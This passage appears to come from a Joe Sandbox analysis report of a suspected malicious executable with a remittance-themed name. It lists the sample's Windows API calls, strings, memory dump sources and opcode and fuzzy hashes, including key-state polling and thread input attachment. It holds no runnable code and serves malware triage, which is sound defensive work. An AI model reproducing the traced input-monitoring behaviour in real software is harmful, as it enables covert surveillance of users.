                                                                      • CoUninitialize.OLE32 ref: 0046C645
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                        • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                      • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                      • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                      • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                      • API String ID: 2294789929-1287834457
                                                                      • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                      • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                      • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                      • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                      APIs
                                                                        • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                        • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                        • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                        • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                      • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                      • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                      • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                      • ReleaseCapture.USER32 ref: 0047116F
                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                      • API String ID: 2483343779-2107944366
                                                                      • Opcode ID: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                                                                      • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                      • Opcode Fuzzy Hash: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                                                                      • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                      • _wcslen.LIBCMT ref: 00450720
                                                                      • _wcscat.LIBCMT ref: 00450733
                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                      • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window_wcscat_wcslen
                                                                      • String ID: -----$SysListView32
                                                                      • API String ID: 4008455318-3975388722
                                                                      • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                      • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                      • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                      • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                      APIs
                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                      • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                      • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                      • GetParent.USER32 ref: 00469C98
                                                                      • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                      • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                      • GetParent.USER32 ref: 00469CBC
                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 2360848162-1403004172
                                                                      • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                      • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                      • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                      • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                      • String ID:
                                                                      • API String ID: 262282135-0
                                                                      • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                      • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                      • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                      • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                      APIs
                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                      • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                      • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                      • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                      • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$LongWindow
                                                                      • String ID:
                                                                      • API String ID: 312131281-0
                                                                      • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                      • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                      • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                      • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                      APIs
                                                                        • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                      • SendMessageW.USER32(75A923D0,00001001,00000000,?), ref: 00448E16
                                                                      • SendMessageW.USER32(75A923D0,00001026,00000000,?), ref: 00448E25
                                                                        • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                      • String ID:
                                                                      • API String ID: 3771399671-0
                                                                      • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                      • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                      • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                      • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                      APIs
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                      • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                      • String ID:
                                                                      • API String ID: 2156557900-0
                                                                      • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                      • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                      • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                      • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                      • API String ID: 0-1603158881
                                                                      • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                      • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                      • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                      • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                      APIs
                                                                      • CreateMenu.USER32 ref: 00448603
                                                                      • SetMenu.USER32(?,00000000), ref: 00448613
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                      • IsMenu.USER32(?), ref: 004486AB
                                                                      • CreatePopupMenu.USER32 ref: 004486B5
                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                      • DrawMenuBar.USER32 ref: 004486F5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                      • String ID: 0
                                                                      • API String ID: 161812096-4108050209
                                                                      • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                      • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                      • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                      • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe), ref: 00434057
                                                                      • LoadStringW.USER32(00000000), ref: 00434060
                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                      • LoadStringW.USER32(00000000), ref: 00434078
                                                                      • _wprintf.LIBCMT ref: 004340A1
                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                      Strings
                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                      • C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe, xrefs: 00434040
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                                      • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe
                                                                      • API String ID: 3648134473-891288512
                                                                      • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                      • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                      • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                      • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0b34b3a5b5d670eb49a5e2d7b5cd424f37d7569b2aa50e3450060746f4beba41
                                                                      • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                      • Opcode Fuzzy Hash: 0b34b3a5b5d670eb49a5e2d7b5cd424f37d7569b2aa50e3450060746f4beba41
                                                                      • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                      • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                      • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                      • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                      APIs
                                                                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,0040F545,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,004A90E8,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,?,0040F545), ref: 0041013C
                                                                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                      • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
